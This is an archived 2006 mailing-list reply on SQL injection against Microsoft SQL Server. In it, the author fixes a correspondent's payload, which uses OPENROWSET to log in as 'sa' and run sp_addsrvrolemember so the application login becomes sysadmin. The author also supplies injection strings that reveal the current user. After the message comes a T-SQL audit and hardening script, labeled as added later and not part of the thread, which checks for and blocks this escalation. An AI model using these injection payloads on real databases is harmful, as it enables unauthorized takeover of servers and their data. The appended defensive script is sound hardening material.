RE: custom xp_cmdshell on SQL Server

From: Victor Chapela (victor@sm4rt.com)
Date: Tue Sep 19 2006 - 20:20:32 EDT


Andy,

> Correct. But since I am injecting 'CREATE PROCEDURE' inside
> an OPENROWSET statement, that should solve the issue, as the
> SQL code inside the OPENROWSET is executed as a batch in
> itself (correct me if I am wrong)

You may be right and that would be a nice workaround for the create
procedure lockout. Have you tried it locally with openrowset and does it
work?

> I am running my code as an unprivileged user, but I escalated
> to 'sa' using OPENROWSET

But I mean an unprivileged OS user. SQL Server does not always run as NT
Authority\SYSTEM. If you are 'SA' you inherit SQL Server's privileges, and at
the operating system level you can still be "guest" or, more frequently, an
account named sql_server or something similar (which may not have access to
execute system32 binaries).

> ' and 1=(select * from
> openrowset('SQLOLEDB','DRIVER={SQLServer};SERVER=<server>;UID=sa;PWD=<password>',
> N'select user; declare @u varchar(50); set @u = (select system_user);
> exec master.dbo.sp_addsrvrolemember @u, ''sysadmin'''))--

There is an error in this query I sent you. You should avoid declaring the
variable, because it is being set within the context of the openrowset query:
the way it is, you will be adding SA to sysadmin. Try it this way:

' and 1=(select * from openrowset('SQLOLEDB','DRIVER={SQLServer};
SERVER=<server>;UID=sa;PWD=<password>',N'select user; exec
master.dbo.sp_addsrvrolemember <app user>, ''sysadmin'''))--

Obtain <app user> with [' and 1=system_user --] or [' and 1=user --]. In this
case both should be the same.

Regards,
Victor
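The exchange above relies on two server-side preconditions: ad hoc distributed queries (OPENROWSET with embedded credentials) being permitted, and the 'sa' login being usable. The T-SQL below is an added defender-side check and hardening script, not code from Victor's message or the thread; it assumes SQL Server 2005 or later for `sys.configurations`, `sys.server_principals` and `ALTER LOGIN`, and SQL Server 2008 R2 SP1 or later for `sys.dm_server_services`.

```sql
-- Added example (not from the original message): checks and hardening for the
-- preconditions of the OPENROWSET-based escalation discussed above.

-- 1. Is the instance allowed to run ad hoc OPENROWSET/OPENDATASOURCE queries?
--    value_in_use = 1 means an injected OPENROWSET(...) can reconnect to the
--    instance with credentials embedded in the query string.
SELECT name, value_in_use
FROM sys.configurations
WHERE name = N'Ad Hoc Distributed Queries';

-- 2. Which logins hold the sysadmin fixed server role? An application login
--    showing up here is the footprint that sp_addsrvrolemember abuse leaves.
SELECT sp.name, sp.type_desc
FROM sys.server_principals AS sp
WHERE IS_SRVROLEMEMBER(N'sysadmin', sp.name) = 1
  AND sp.type IN ('S', 'U', 'G');   -- SQL logins, Windows logins, Windows groups

-- 3. Which OS account does the engine run as? This is the privilege level an
--    attacker inherits at the OS layer even after reaching 'sa'.
--    (Requires SQL Server 2008 R2 SP1 or later.)
SELECT servicename, service_account
FROM sys.dm_server_services;

-- 4. Hardening: disable the ad hoc feature. It is an advanced option, so it has
--    to be exposed before it can be changed; RECONFIGURE applies the value
--    without a service restart.
EXEC sp_configure N'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure N'Ad Hoc Distributed Queries', 0;
RECONFIGURE;
EXEC sp_configure N'show advanced options', 0;
RECONFIGURE;

-- 5. Hardening: take the well-known 'sa' login out of play so a leaked or
--    guessed password cannot be used in the UID=sa;PWD=... connection string.
ALTER LOGIN sa DISABLE;
```

Run the first three statements from a sysadmin session as a baseline and again after any suspected injection; a new row in the sysadmin listing, or `value_in_use` flipping back to 1, is what to alert on.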


This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:56:59 EDT